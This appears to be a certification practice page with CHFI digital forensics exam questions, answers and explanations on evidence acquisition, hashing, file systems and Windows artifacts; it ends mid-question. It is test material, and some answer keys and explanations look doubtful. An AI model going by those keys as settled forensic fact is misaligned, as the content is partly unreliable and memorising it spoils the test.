Courseiva
Knowledge + Practice
CertificationsVendorsCareer RoadmapsLabs & ToolsStudy GuidesGlossaryPractice Questions
C
Courseiva

Free IT certification practice questions with explained answers for CCNA, CompTIA, AWS, Azure, Google Cloud, and more.

Certification Practice Questions

CCNA practice questionsSecurity+ SY0-701 practice questionsAWS SAA-C03 practice questionsAZ-104 practice questionsAZ-900 practice questionsCLF-C02 practice questionsA+ Core 1 practice questionsGoogle Cloud ACE practice questionsCySA+ CS0-003 practice questionsNetwork+ N10-009 practice questions
View all certifications →

Product

CertificationsCertification PathsExam TopicsPractice TestsExam Dumps vs Practice TestsStudy HubComparisons

Company

AboutContactEditorial PolicyQuestion Writing PolicyTrust Center

Legal

Privacy PolicyTerms of Service

Courseiva is a free IT certification practice platform offering original exam-style practice questions, detailed explanations, topic-based practice, mock exams, readiness tracking, and study analytics for Cisco, CompTIA, Microsoft, AWS, and other technology certifications.

© 2026 Courseiva. Courseiva is operated by JTNetSolutions Ltd. All rights reserved.

Courseiva is an independent certification practice platform and is not affiliated with, endorsed by, or sponsored by Cisco, Microsoft, AWS, CompTIA, Google, ISC2, ISACA, or any other certification vendor. Vendor names and certification marks are used only to identify the exams learners are preparing for.

HomeCertificationsCHFIExam Questions

EC-Council · Free Practice Questions · Last reviewed May 2026

CHFI Exam Questions and Answers

78real exam-style questions organised by domain, each with the correct answer highlighted and a plain-English explanation of why it's right — and why the others are wrong.

125 exam questions
240 min time limit
Pass: 700/1000 / 1000
13 exam domains
OverviewDomain BlueprintStudy GuideAll QuestionsSample by Domain
1. Computer Forensics Investigation Process2. Computer Forensics Fundamentals and Process3. Storage Forensics and File System Analysis4. Incident Response and First Responder Skills5. Computer Forensics Lab6. Evidence Acquisition and Duplication7. OS and Network Forensics8. OS and File System Forensics9. Application, Email and Cloud Forensics10. Mobile and Malware Forensics11. Network and Cloud Forensics12. Database and Application Forensics13. Malware Forensics
1

Domain 1: Computer Forensics Investigation Process

All Computer Forensics Investigation Process questions
Q1
easyFull explanation →

During a forensic investigation, an analyst discovers that the suspect's hard drive was encrypted using BitLocker. The analyst has obtained the recovery key. Which of the following is the best next step to ensure data integrity?

A

Decrypt the drive using the recovery key and then create a forensic image.

B

Run a live analysis tool to extract encryption keys from memory.

C

Create a forensic image of the encrypted drive, then decrypt the image.

This preserves the original encrypted state and allows analysis of the decrypted image.

D

Boot the suspect computer and copy files to an external drive.

Why: Option C is correct because creating a forensic image of the encrypted drive before decryption preserves the original evidence in its pristine, unaltered state. Decrypting the image later using the recovery key ensures that the original encrypted data remains intact and verifiable, maintaining data integrity throughout the investigation.
Q2
mediumFull explanation →

A CHFI analyst is called to investigate a suspected data breach. The IT team has already shut down the server. Which of the following is the most appropriate order of actions to preserve evidence?

A

Immediately power on the server to check for running processes.

B

Copy all files from the server to an external USB drive.

C

Run antivirus scan to ensure no malware is present before imaging.

D

Secure the scene, photograph the setup, document connections, remove hard drives, and create forensic images using a write-blocker.

This follows proper forensic procedure: secure, document, collect, image with write-blocker.

Why: Option D is correct because it follows the established forensic investigation process: secure the scene to prevent contamination, document the state of the server (photographs and connection diagrams), then physically remove the hard drives and create forensic images using a write-blocker to preserve the original data without alteration. This ensures evidence integrity and admissibility in legal proceedings.
Q3
hardFull explanation →

An incident responder has acquired a forensic image of a Linux server suspected of being compromised. The image was taken using 'dd' with no compression. The analyst needs to verify the integrity of the image. Which command should be used and what should be compared?

A

Use 'cmp' to compare the image byte-by-byte with the original drive.

B

Use 'md5sum image.dd' and compare with the original file's MD5 hash provided by the system administrator.

C

Run 'fsck' on the image to check for filesystem errors.

D

Use 'sha256sum image.dd' and compare with the hash computed during acquisition from the source device.

SHA-256 is strong and comparing with the hash from the source verifies integrity.

Why: Option D is correct because the SHA-256 hash computed during acquisition from the source device provides a cryptographic integrity check. By recomputing the hash on the acquired image and comparing it to the original hash, the analyst can verify that the image is an exact bit-for-bit copy without any alteration or corruption. SHA-256 is preferred over MD5 in forensic contexts due to its stronger collision resistance.
Q4
mediumFull explanation →

Which TWO of the following are considered essential steps in the computer forensics investigation process according to EC-Council guidelines?

A

Identification of potential evidence

Identification is the first step in the forensic process.

B

Data recovery from damaged media

C

Deletion of irrelevant data

D

Preservation of the integrity of evidence

Preservation is critical to maintain chain of custody.

E

Public disclosure of findings

Why: Identification of potential evidence is a core initial step in the EC-Council's computer forensics investigation process because it defines the scope and sources of data that may contain relevant evidence. Without proper identification, investigators risk missing critical data or collecting irrelevant information, which can compromise the entire investigation. This step involves recognizing potential evidence sources such as hard drives, network logs, and volatile memory, ensuring that all relevant data is accounted for before collection begins.
Q5
mediumFull explanation →

An analyst executed the commands shown in the exhibit on a Windows system to prepare a forensic image for analysis. What is the most likely reason for the error message from e2fsck?

A

The analyst failed to properly dismount the source volume before imaging, leading to filesystem inconsistencies.

The fsutil dismount command was run on C:, but the image was taken later, possibly without ensuring the volume was cleanly unmounted.

B

The forensic image was not acquired with a write-blocker, causing data corruption.

C

The image file contains an NTFS filesystem, but e2fsck is designed for ext filesystems.

D

The e2fsck command syntax is incorrect; it should be 'e2fsck -f -n' instead.

Why: The error message from e2fsck indicates that the filesystem has inconsistencies, which typically occur when a volume is imaged while it is still mounted and actively being written to. The analyst likely did not dismount the source volume before acquiring the forensic image, resulting in a snapshot that reflects an inconsistent state (e.g., dirty journal, unflushed writes). This is a common chain-of-custody and acquisition procedure error in forensic imaging.
Q6
hardFull explanation →

You are a CHFI analyst responding to a security incident at a medium-sized financial firm. The IT team reports that an employee's workstation (Windows 10, single SSD) was used to access sensitive customer data without authorization. The workstation is still running, and the employee is currently logged in. The IT team has isolated the machine from the network but has not powered it off. You have been called to perform forensic acquisition. The company policy requires preservation of volatile data and a full disk image. The machine has 16 GB RAM and a 512 GB SSD. You have a forensic toolkit including FTK Imager, win32dd (for memory acquisition), and a write-blocker. Which of the following is the best course of action?

A

Use win32dd to capture the contents of RAM to an external drive, then use FTK Imager to create a physical image of the SSD over the network to a secure share.

This captures memory first (volatile data) and then acquires a disk image while the system is still running, preserving evidence.

B

Perform a graceful shutdown via the operating system, then remove the SSD and image it using a hardware write-blocker.

C

Boot the workstation from a forensic live CD, then use 'dd' to image the SSD to an external USB drive.

D

Immediately shut down the workstation by unplugging the power cord, remove the SSD, and create a forensic image using a write-blocker on a forensic workstation.

Why: Option A is correct because it follows the proper order of volatility: capturing RAM first (volatile data) using win32dd, then imaging the SSD with FTK Imager. Since the machine is still running and isolated, network imaging is acceptable and preserves the disk state without risking data loss from a shutdown. This approach complies with the requirement to preserve volatile data and create a full disk image.

Want more Computer Forensics Investigation Process practice?

Practice this domain
2

Domain 2: Computer Forensics Fundamentals and Process

All Computer Forensics Fundamentals and Process questions
Q1
easyFull explanation →

A first responder arrives at a crime scene where a computer is running. According to standard forensic procedure, what should the responder do FIRST?

A

Photograph the scene and secure the area

Securing and photographing the scene ensures preservation of the original state.

B

Connect a write blocker and create a forensic image immediately

C

Immediately shut down the computer to prevent data alteration

D

Pull the power cord to ensure the system does not shut down normally

Why: Option A is correct because the first priority at a live crime scene is to preserve the integrity of the scene and all potential evidence. Standard forensic procedure (e.g., from NIST SP 800-86 and ACPO guidelines) mandates that the first responder must photograph the scene to document the state of the computer (including screen contents, cables, and peripherals) and secure the area to prevent unauthorized access or tampering. Only after this documentation and scene stabilization can the responder proceed to handle the live system, such as capturing volatile data or creating a forensic image.
Q2
mediumFull explanation →

During a forensic investigation, an analyst uses a hardware write blocker to connect a suspect hard drive to a forensic workstation. What is the primary purpose of using a hardware write blocker?

A

To prevent the operating system from writing to the source drive

This is the core function: blocking write commands to preserve evidence.

B

To speed up the data transfer rate during imaging

C

To compress the forensic image to save storage space

D

To automatically hash the drive contents for integrity verification

Why: A hardware write blocker physically intercepts the write commands from the forensic workstation to the suspect drive, ensuring that no data can be altered on the source drive during acquisition. This preserves the evidentiary integrity of the original media, which is a foundational requirement in digital forensics to maintain a chain of custody and admissibility in court.
Q3
hardFull explanation →

A forensic investigator is preparing to acquire the contents of a live system's RAM. Which of the following tools is specifically designed for this purpose and captures memory without altering the system state?

A

Tableau write blocker

B

EnCase

C

FTK Imager

FTK Imager includes a memory capture feature that preserves the system state.

D

dd

Why: FTK Imager is specifically designed for live memory acquisition on Windows systems, capturing RAM contents via a kernel-level driver (e.g., win32dd or FTK Imager's own memory capture module) that reads physical memory without modifying the system state. It creates a forensic image (e.g., .mem or .raw) while maintaining data integrity through hashing (MD5/SHA1). This makes it the correct choice for acquiring RAM from a live system without altering evidence.
Q4
mediumFull explanation →

During a forensic investigation, an analyst creates a forensic image using `dcfldd` with the command: `dcfldd if=/dev/sda of=image.dd hash=sha256 hashwindow=10M`. What is the purpose of the `hashwindow` parameter?

A

It limits the total amount of data to hash to 10 MB

B

It creates a hash for every 10 MB block of data

This allows verification of each 10 MB segment independently.

C

It sets the hash algorithm to SHA-256

D

It enables error correction for every 10 MB

Why: The `hashwindow` parameter in `dcfldd` specifies the size of the data chunks for which individual hash values are computed. With `hashwindow=10M`, the tool generates a SHA-256 hash for every 10 MB block of the input data, allowing verification of integrity on a per-block basis rather than only a single hash for the entire image. This is useful for detecting corruption or tampering in specific segments of large forensic images.
Q5
easyFull explanation →

What is the primary goal of the chain of custody in a digital forensic investigation?

A

To maintain the integrity and admissibility of evidence

This is the main purpose: to show that evidence has not been tampered with.

B

To encrypt the evidence during transport

C

To speed up the forensic analysis process

D

To ensure that the forensic tools used are properly licensed

Why: The chain of custody is a documented chronological record that tracks the seizure, custody, control, transfer, analysis, and disposition of digital evidence. Its primary goal is to maintain the integrity and admissibility of evidence by proving that the evidence has not been tampered with or altered from the moment it was collected until it is presented in court. This is critical because any break in the chain can lead to evidence being deemed inadmissible under rules like the Federal Rules of Evidence (FRE) or the Daubert standard.
Q6
mediumFull explanation →

A forensic analyst is examining a hard drive that was seized from a suspect's home. The analyst uses FTK Imager to create a forensic image. After imaging, the analyst computes the MD5 hash of the image and compares it to the hash computed at the scene. The hashes match. What does this confirm?

A

The file system is intact and readable

B

The image is an exact bit-for-bit copy of the original drive

Hash matching verifies data integrity.

C

The drive contains malware

D

The drive was not encrypted

Why: B is correct because a matching MD5 hash between the image and the original drive confirms that the forensic image is an exact bit-for-bit copy. Hashing algorithms like MD5 produce a unique fixed-size hash value based on the binary content; if two hashes match, the data is identical with no alterations. This validates the integrity of the acquisition process, ensuring that the image is a perfect forensic duplicate.

Want more Computer Forensics Fundamentals and Process practice?

Practice this domain
3

Domain 3: Storage Forensics and File System Analysis

All Storage Forensics and File System Analysis questions
Q1
easyFull explanation →

An analyst recovers a hard drive from a suspect's computer. The drive has a partition table that uses a 32-bit identifier and a maximum partition size of 2 TB. Which partition table type is present?

A

HFS+

B

GPT

C

APFS

D

MBR

MBR uses 32-bit partition table entries with a maximum partition size of 2 TB.

Why: MBR uses 32-bit partition table entries and supports up to 2 TB partitions. GPT uses 64-bit entries and supports larger disks.
Q2
easyFull explanation →

During a forensic investigation, an examiner wants to recover deleted files from a FAT32 file system. Which structure is most critical for file recovery?

A

File Allocation Table (FAT)

FAT stores cluster chains; deleted files may have their directory entries and FAT chains intact.

B

Master File Table (MFT)

C

Journal

D

Inode table

Why: The File Allocation Table (FAT) contains cluster chains for files; deleted entries may still be recoverable if not overwritten.
Q3
easyFull explanation →

Which tool is specifically designed for file carving and can recover files based on headers and footers without relying on file system metadata?

A

FTK Imager

B

Foremost

Foremost is a command-line file carver that recovers files based on headers, footers, and data structures.

C

Autopsy

D

Volatility

Why: Foremost is a file carving tool that uses headers/footers. Autopsy and FTK have carving modules but Foremost is dedicated to it.
Q4
mediumFull explanation →

An analyst notices that a file on an NTFS volume occupies 4096 bytes on disk but its actual data is only 100 bytes. The extra space contains remnants of a previously deleted file. What is this extra space called?

A

Volume slack

B

Free space

C

RAM slack

D

File slack

File slack is the unused space in the last cluster of a file that may contain data from other files.

Why: File slack is the unused space between the end of the file data and the end of the last cluster allocated to the file.
Q5
mediumFull explanation →

A forensic investigator is analyzing a Linux ext4 file system. They suspect a file was deleted but its inode may still be intact. Which tool can be used to recover the file by referencing the inode?

A

dd

B

scalpel

C

foremost

D

debugfs

debugfs can be used to inspect and recover files from ext file systems by inode.

Why: The 'debugfs' tool can access ext2/3/4 file systems directly and recover files from inodes. 'extundelete' also works, but debugfs is more versatile.
Q6
mediumFull explanation →

During a forensic examination of an NTFS drive, an investigator finds that a file 'notes.txt' has an additional data stream named 'hidden.txt' attached. Which feature of NTFS allows this?

A

USN Journal

B

MFT

C

Alternate Data Streams (ADS)

ADS allows hiding data in separate streams attached to a file.

D

Slack space

Why: C is correct because NTFS supports Alternate Data Streams (ADS), a feature that allows multiple data streams to be associated with a single file. The 'hidden.txt' stream attached to 'notes.txt' is a classic example of ADS, which can be used to hide data or store metadata without affecting the file's primary content.

Want more Storage Forensics and File System Analysis practice?

Practice this domain
4

Domain 4: Incident Response and First Responder Skills

All Incident Response and First Responder Skills questions
Q1
easyFull explanation →

An analyst receives an alert indicating a suspicious process (PID 3342) is making outbound connections on port 443 to an unknown IP. The system is a Windows 10 workstation. Which first responder action is MOST appropriate?

A

Capture a full memory dump using a tool like FTK Imager (Memory Capture) or DumpIt.

Memory capture preserves running processes, network connections, and other volatile data crucial for analysis.

B

Immediately disconnect the system from the network to contain the threat.

C

Check the Windows Event Logs for related entries.

D

Reboot the system to clear any malicious processes from memory.

Why: Capturing a full memory dump (option A) is the most appropriate first responder action because it preserves the volatile state of the suspicious process (PID 3342) and its associated artifacts (e.g., network connections, loaded DLLs, encryption keys) before any further system changes occur. This allows forensic analysis to identify the malware's behavior, such as command-and-control (C2) communication over port 443 (HTTPS), without altering evidence. Tools like FTK Imager (Memory Capture) or DumpIt acquire a raw .mem file that can be analyzed with Volatility or Rekall to extract process details, network sockets, and injected code.
Q2
mediumFull explanation →

A security team suspects a data breach via an external attacker. The incident response plan requires preservation of evidence for legal proceedings. Which order of volatility should the first responder follow?

A

Capture disk image, then memory, then network connections.

B

Record network connections, capture disk image, then memory.

C

Capture memory, record network connections, acquire disk image, then collect backups.

This follows the correct order of volatility from most to least volatile.

D

Collect backups first, then disk image, then memory.

Why: Option C is correct because the order of volatility (OOV) dictates that the most volatile data (memory/registers) must be captured first, followed by network connections, then disk images, and finally backups. This sequence minimizes data loss and ensures evidence integrity for legal proceedings, as volatile data is lost when power is removed.
Q3
hardFull explanation →

During an incident response, a first responder needs to collect evidence from a Linux server that is still running. The server has sensitive data and cannot be shut down. Which technique is BEST for acquiring a forensic image of the hard disk?

A

Use dd if=/dev/sda of=/mnt/evidence/image.dd conv=noerror,sync

B

Use dd if=/dev/sda of=/mnt/evidence/image.dd bs=4M

dd copying the entire disk (/dev/sda) creates a complete forensic image.

C

Use dd if=/dev/mapper/root of=/mnt/evidence/image.dd

D

Use dd if=/dev/sda1 of=/mnt/evidence/image.dd

Why: Option B is correct because it uses dd with a 4M block size, which improves acquisition speed while still producing a bit-for-bit forensic image of the entire disk (/dev/sda). The conv=noerror,sync option in A is unnecessary for a live acquisition from a healthy disk and can mask read errors, while B's larger block size is more efficient for imaging a running system without shutdown.
Q4
easyFull explanation →

A first responder arrives at a scene where a computer is powered on and a user is logged in. An incident is suspected. What should the responder do FIRST?

A

Begin capturing a memory dump using a forensic tool.

B

Power off the computer immediately to preserve the disk.

C

Photograph the screen to document the current state.

Documentation of the live state is critical before any collection.

D

Ask the user to log off so the system can be imaged.

Why: Option C is correct because the first priority at a live incident scene is to preserve volatile evidence. Photographing the screen captures the current state of the system, including open applications, network connections, and user activity, which can be lost if the system is altered or powered down. This documentation provides a baseline for the investigation and ensures that critical volatile data is recorded before any forensic acquisition begins.
Q5
mediumFull explanation →

You are responding to a suspected malware infection on a Windows 10 system. The system is still running. Which of the following should you collect FIRST?

A

Acquire a memory dump using a tool like WinPmem.

Memory is the most volatile and must be captured first.

B

Collect the Windows Event Logs.

C

Export the contents of the Windows Registry.

D

Create a forensic image of the hard drive.

Why: When a system is still running and suspected of malware infection, the first priority is to capture volatile data, which includes the contents of RAM. WinPmem is a tool designed to acquire a memory dump from a live Windows system, preserving critical evidence such as running processes, network connections, and injected code that would be lost on shutdown. This follows the order of volatility (RFC 3227), which mandates collecting memory before any non-volatile data like logs, registry, or disk images.
Q6
hardFull explanation →

During an incident response, a first responder needs to preserve the integrity of evidence. Which action ensures the best chain of custody?

A

Use a write blocker when acquiring the disk image.

B

Compute a SHA-256 hash of the acquired image immediately after collection and record it in the chain of custody form.

Hashing provides a verifiable integrity check.

C

Document every person who handled the evidence.

D

Place the evidence in an evidence bag and lock it in a secure room.

Why: Option B is correct because computing a SHA-256 hash immediately after acquisition creates a cryptographic fingerprint of the image. This hash, when recorded in the chain of custody form, provides verifiable integrity: any subsequent alteration of the image will produce a different hash, proving tampering. While other steps are important, only hashing directly ties the evidence's integrity to a mathematical proof that can be independently verified later.

Want more Incident Response and First Responder Skills practice?

Practice this domain
5

Domain 5: Computer Forensics Lab

All Computer Forensics Lab questions
Q1
mediumFull explanation →

During a forensic investigation, an analyst needs to acquire data from a live Windows system without altering the system's state. Which tool should the analyst use to capture the contents of RAM?

A

dd

B

FTK Imager Lite

FTK Imager Lite is designed to capture RAM from a live system without altering the system's state.

C

EnCase

D

WinHex

Why: FTK Imager Lite is designed for live forensic acquisition on Windows systems, including capturing RAM contents without altering the system state. It uses a lightweight, read-only approach that avoids writing to the disk or modifying memory pages, preserving the integrity of the evidence.
Q2
hardFull explanation →

A forensic lab is designing a network architecture to ensure the integrity of evidence during acquisition. What is the most critical design consideration?

A

Deploy multiple forensic workstations to parallelize tasks

B

Use a segmented network to isolate forensic tools

C

Encrypt all data in transit over the network

D

Implement hardware write-blockers on all acquisition stations

Write-blockers prevent any writes to the source drive, ensuring integrity.

Why: Hardware write-blockers are the most critical design consideration because they physically prevent any write operations to the source drive at the ATA/SCSI command level, ensuring that the evidence remains bit-for-bit unchanged during acquisition. Without a hardware write-blocker, even a single read operation from a forensic workstation could inadvertently modify metadata (e.g., last access timestamps) or trigger anti-forensic mechanisms, compromising the integrity of the evidence and its admissibility in court.
Q3
easyFull explanation →

A forensic analyst is troubleshooting a write-blocker that is not working correctly. The analyst connected the write-blocker between the suspect drive and the forensic workstation, but the workstation still shows the drive as writable. What is the most likely cause?

A

The suspect drive was connected before the write-blocker was powered on

Connecting the drive before powering the write-blocker can bypass the write-block.

B

The write-blocker does not have external power

C

The suspect drive uses SATA but the write-blocker is USB-only

D

The write-blocker is connected to the suspect drive's output port

Why: When a write-blocker is powered on after the suspect drive is already connected, the drive may have already been enumerated by the operating system as a writable device. Write-blockers rely on intercepting and filtering ATA/SCSI commands at the hardware level before the OS sees the drive; if the drive is connected first, the OS may have already sent write commands or cached write attributes, bypassing the blocker's protection. This is why the proper sequence is to power on the write-blocker first, then connect the suspect drive.
Q4
mediumFull explanation →

A forensic lab is establishing a chain of custody procedure. Which practice is considered best according to CHFI guidelines?

A

Require biometric authentication for all lab personnel

B

Store evidence in a secure room with limited access

C

Use encryption to protect evidence files

D

Document every transfer of evidence with signatures and timestamps

Documentation is key to maintaining chain of custody.

Why: Option D is correct because the chain of custody is fundamentally a legal and procedural requirement to demonstrate the integrity and admissibility of digital evidence. CHFI guidelines emphasize that every transfer of evidence must be meticulously documented with signatures, timestamps, and purpose to create an unbroken audit trail, which is the only practice that directly satisfies the legal standard for evidence handling.
Q5
hardFull explanation →

Which TWO of the following are essential components of a computer forensics lab according to CHFI best practices?

A

Server farm for data processing

B

Evidence storage area with controlled access

Critical for evidence integrity.

C

Public-facing website for case management

D

Coffee machine for staff convenience

E

Forensic workstation with specialized software

Required for analysis.

Why: Option B is correct because a computer forensics lab must have a secure evidence storage area with controlled access to maintain the chain of custody and prevent tampering or unauthorized access to digital evidence. CHFI best practices emphasize physical security controls, such as biometric locks or access logs, to ensure evidence integrity throughout the investigation lifecycle.
Q6
mediumFull explanation →

Which THREE of the following are recommended practices for maintaining the integrity of digital evidence in a forensics lab?

A

Maintain a detailed chain of custody log

Documents handling and prevents tampering.

B

Generate cryptographic hashes of evidence files

Hashes verify that evidence has not been altered.

C

Use hardware write-blockers during acquisition

Prevents modification of source drive.

D

Perform regular backups of all evidence

E

Run antivirus scans on evidence before analysis

Why: Maintaining a detailed chain of custody log (Option A) is a recommended practice because it provides a verifiable, chronological record of every person who handled the evidence, the time and date of each transfer, and the purpose of each transfer. This ensures the evidence's integrity by demonstrating that it has not been tampered with or altered from the moment of seizure through analysis and presentation in court. Without a proper chain of custody, the evidence can be challenged as inadmissible under rules like Federal Rule of Evidence 901.

Want more Computer Forensics Lab practice?

Practice this domain
6

Domain 6: Evidence Acquisition and Duplication

All Evidence Acquisition and Duplication questions
Q1
mediumFull explanation →

During a forensic investigation, you are asked to acquire the contents of RAM from a live Windows 10 system without causing system instability. Which tool would be most appropriate for this task?

A

LiME

B

DumpIt

C

FTK Imager

D

Belkasoft RAM Capturer

Belkasoft RAM Capturer is designed for Windows live RAM acquisition and is stable.

Why: Belkasoft RAM Capturer is the most appropriate tool for acquiring RAM from a live Windows 10 system because it is designed specifically for live memory acquisition on Windows, uses a lightweight kernel-mode driver to read physical memory without causing system instability, and supports acquisition from 64-bit systems. Unlike other tools, it minimizes interaction with the target process list and avoids loading unnecessary user-mode components that could trigger crashes or alter the memory state.
Q2
hardFull explanation →

You are imaging a suspect's hard drive using a write blocker and dd command. After imaging, you verify the hash of the original drive and the image file. The original drive hash is SHA1: A1B2C3D4E5..., and the image hash is SHA1: F6G7H8I9J0... What is the most likely cause of the mismatch?

A

The dd command used a different block size

B

The write blocker malfunctioned and allowed writes to the original drive

If the original drive was modified during acquisition, the hashes will differ.

C

The dd command compressed the output

D

The image file was corrupted during transfer

Why: The hash mismatch indicates that the data on the original drive and the image file are not identical. A write blocker malfunction that allowed writes to the original drive during the imaging process would alter the source data after the initial hash was computed, causing the final hash of the original drive to differ from the hash of the image file taken at a different point in time. This is the most direct cause of a hash mismatch because the write blocker's primary purpose is to prevent any modification to the evidence.
Q3
easyFull explanation →

A forensic examiner needs to acquire a hard drive that is part of a RAID 5 array. The RAID controller is unavailable. What is the best approach to acquire the data?

A

Acquire each disk individually, then reconstruct the array using software

This is the standard method when the controller is unavailable.

B

Acquire only one disk because RAID 5 can be reconstructed from a single disk

C

Use a hardware write blocker that supports RAID

D

Connect the RAID array to a similar controller and acquire as a single drive

Why: When the RAID controller is unavailable, the only reliable method to acquire the data is to image each physical disk individually using a forensic write blocker, then reconstruct the logical RAID 5 volume in a forensic software tool (e.g., FTK Imager, X-Ways Forensics, or EnCase). This preserves the original evidence on each disk and allows the examiner to rebuild the array by specifying the stripe size, parity rotation, and disk order, which is essential because RAID 5 distributes data and parity across all disks and can tolerate a single disk failure.
Q4
mediumFull explanation →

During a network forensic investigation, you need to capture live network traffic from a switch span port. Which tool would best capture the traffic in a forensically sound manner?

A

Nmap

B

Wireshark

Wireshark captures packets and can save them in standard formats.

C

Netcat

D

Tcpdump

Why: Wireshark is the best tool for capturing live network traffic from a switch SPAN port in a forensically sound manner because it provides a robust graphical interface for real-time packet capture and analysis, supports full packet capture with timestamps, and can write captures directly to a pcapng file format that preserves packet integrity and metadata. Its ability to run in promiscuous mode ensures all traffic from the SPAN port is captured without altering the data, meeting forensic requirements for accuracy and completeness.
Q5
hardFull explanation →

You are acquiring a laptop with a self-encrypting drive (SED) that is powered on and logged in. What is the best method to acquire the drive while preserving encrypted data?

A

Remove the drive and use a forensic bridge that supports SED

B

Power off the laptop and image the drive using a hardware write blocker

C

Acquire a logical image from the running operating system

Since the system is logged in, the data is decrypted and accessible.

D

Boot from a forensic live CD and image the drive

Why: When a self-encrypting drive (SED) is powered on and logged in, the drive's hardware encryption key is already loaded and the data is accessible through the operating system. The best method to preserve the encrypted data in its decrypted state is to acquire a logical image from the running OS, which captures files and metadata without powering off the drive and losing the decryption context. Removing power or rebooting would cause the SED to lock, requiring the authentication key again and potentially altering the data state.
Q6
easyFull explanation →

Which of the following is the primary purpose of using a hardware write blocker during disk acquisition?

A

To decrypt the drive during acquisition

B

To prevent any writes to the original evidence drive

This ensures the integrity of the evidence.

C

To compress the acquired image

D

To increase the speed of the acquisition

Why: A hardware write blocker is a device placed between the suspect drive and the forensic workstation that intercepts and blocks any write commands from the host operating system, ensuring that the original evidence drive remains unaltered. This is critical for maintaining the integrity of digital evidence, as any modification to the source drive could render it inadmissible in court. The primary purpose is therefore to prevent any writes to the original evidence drive, preserving its exact state for forensic analysis.

Want more Evidence Acquisition and Duplication practice?

Practice this domain
7

Domain 7: OS and Network Forensics

All OS and Network Forensics questions
Q1
easyFull explanation →

A security analyst investigates a Windows system and finds an event with ID 4625 in the Security log. What does this event indicate?

A

A failed logon attempt

4625 is the event ID for failed logon.

B

A successful user logon

C

A service was installed

D

A new user account was created

Why: Event ID 4625 indicates a failed logon attempt. This is a standard Windows security event used to track authentication failures.
Q2
mediumFull explanation →

During a forensic analysis of a compromised Linux server, you notice that the file /var/log/auth.log has been cleared. However, you find that the attacker's commands are still partially recoverable. Which artifact most likely contains the attacker's command history?

A

/var/log/syslog

B

~/.bash_history

This file logs commands entered in bash.

C

/proc/1/cmdline

D

/etc/shadow

Why: The bash_history file for each user (typically ~/.bash_history) stores command-line history. Even if auth.log is cleared, this file often retains command entries.
Q3
hardFull explanation →

A forensic analyst recovers a USB device from a suspect's computer. Which Windows registry key should be examined to determine the first time the USB device was connected?

A

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USB

B

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\DeviceClasses\{53f56307-b6bf-11d0-94f2-00a0c91efb8b}

C

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR

Tracks USB storage devices and their first/last connect times.

D

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2

Why: The USBSTOR key records serial numbers and first/last connection times for USB storage devices.
Q4
mediumFull explanation →

An analyst suspects that an attacker used a web shell to execute commands on a Windows web server. Which Windows event ID should the analyst look for to detect service installation that may have been used for persistence?

A

7045

Service installation event.

B

4624

C

4648

D

4720

Why: Event ID 7045 indicates a service was installed on the system, which attackers often use to maintain persistence.
Q5
mediumFull explanation →

A forensic examiner is analyzing a Mac system and wants to review system logs that record various activities, including application launches and kernel events. Which logging system on macOS should be examined?

A

.plist files

B

FSEvents

C

Unified logging (log command)

Centralized logging system for macOS.

D

Console.app logs

Why: Unified logging (via log command) captures system and user activity in a centralized database, replacing traditional syslog.
Q6
easyFull explanation →

In Windows forensics, which artifact is used to track recently accessed files and folders via the 'Recent Items' feature?

A

Jump lists

B

ShellBags

C

Prefetch files

D

LNK files

LNK files track file access via shortcuts.

Why: LNK files (shortcuts) are created automatically when a user opens a file, and they contain metadata such as the target path and timestamps.

Want more OS and Network Forensics practice?

Practice this domain
8

Domain 8: OS and File System Forensics

All OS and File System Forensics questions
Q1
mediumFull explanation →

During a forensic investigation of a compromised Linux server, an investigator needs to recover deleted files from an ext4 filesystem. Which method should the investigator use to maximize recovery of file content, considering the filesystem may have been partially overwritten?

A

Use 'foremost' to carve files based on file headers and footers.

Foremost is a file carving tool that recovers files by scanning for known headers/footers, making it effective for partially overwritten filesystems.

B

Use 'grep -a' to search the raw disk for file signatures.

C

Use 'scalpel' to perform a deep scan of the filesystem.

D

Use 'extundelete' to recover files from the ext4 filesystem.

Why: Foremost is the correct choice because it performs file carving based on headers and footers, which can recover file content even when the filesystem metadata (such as inodes) is damaged or partially overwritten. Unlike undelete tools that rely on intact filesystem structures, foremost scans the raw disk blocks for known file signatures, making it effective for recovering files from an ext4 filesystem that has experienced partial overwriting.
Q2
hardFull explanation →

A forensic analyst is examining a Windows 10 system and needs to determine the last boot time of the system. Which registry hive and key should the analyst query to find this information?

A

NTUSER.DAT hive, key 'Control Panel\Desktop\'

B

SYSTEM hive, key 'CurrentControlSet\Control\Windows\', value 'ShutdownTime'

The 'ShutdownTime' value in this key records the last system shutdown time, which can be used to infer the last boot time (as the system boots after shutdown).

C

SOFTWARE hive, key 'Microsoft\Windows NT\CurrentVersion\'

D

SAM hive, key 'SAM\Domains\Account\Users\'

Why: The SYSTEM hive stores system-wide configuration data, and the key 'CurrentControlSet\Control\Windows\' contains the 'ShutdownTime' value, which records the last system shutdown time. Since the last boot time is effectively the time after the last shutdown, querying this value provides the necessary information. This is a standard forensic artifact for determining system uptime and boot events on Windows 10.
Q3
easyFull explanation →

During a forensic investigation, an analyst needs to preserve the integrity of evidence on a hard drive. Which of the following is the best practice for acquiring an image of the drive?

A

Use the 'dd' command to create a raw image without a write blocker.

B

Connect the drive to a forensic workstation and use the operating system's copy command.

C

Use a hardware write blocker and create a bit-stream image.

A write blocker ensures no data is altered on the original drive during acquisition.

D

Format the drive before imaging to ensure no hidden data is missed.

Why: Option C is correct because using a hardware write blocker ensures that no write commands from the forensic workstation reach the suspect drive, preserving its integrity at the physical level. Creating a bit-stream image (sector-by-sector copy) captures all data, including slack space and unallocated clusters, which is essential for thorough forensic analysis. This combination is the gold standard in digital forensics, as mandated by best practices like those from NIST and the ACPO principles.
Q4
mediumFull explanation →

Which TWO of the following are valid locations in a Windows system where forensic evidence of USB device connection can be found?

A

SYSTEM\CurrentControlSet\Enum\USBSTOR registry key

This key enumerates all USB storage devices that have been connected to the system.

B

Amcache.hve file

C

SetupAPI.dev.log file

This log file records Plug and Play device installations, including USB devices.

D

Event Logs with source 'Device Setup'

E

C:\Windows\Prefetch folder

Why: The SYSTEM\CurrentControlSet\Enum\USBSTOR registry key is a primary location where Windows records every USB storage device that has been connected to the system. Each device is listed under this key with a unique instance ID, including the vendor ID, product ID, and serial number, providing persistent evidence of USB connections even after the device is removed.
Q5
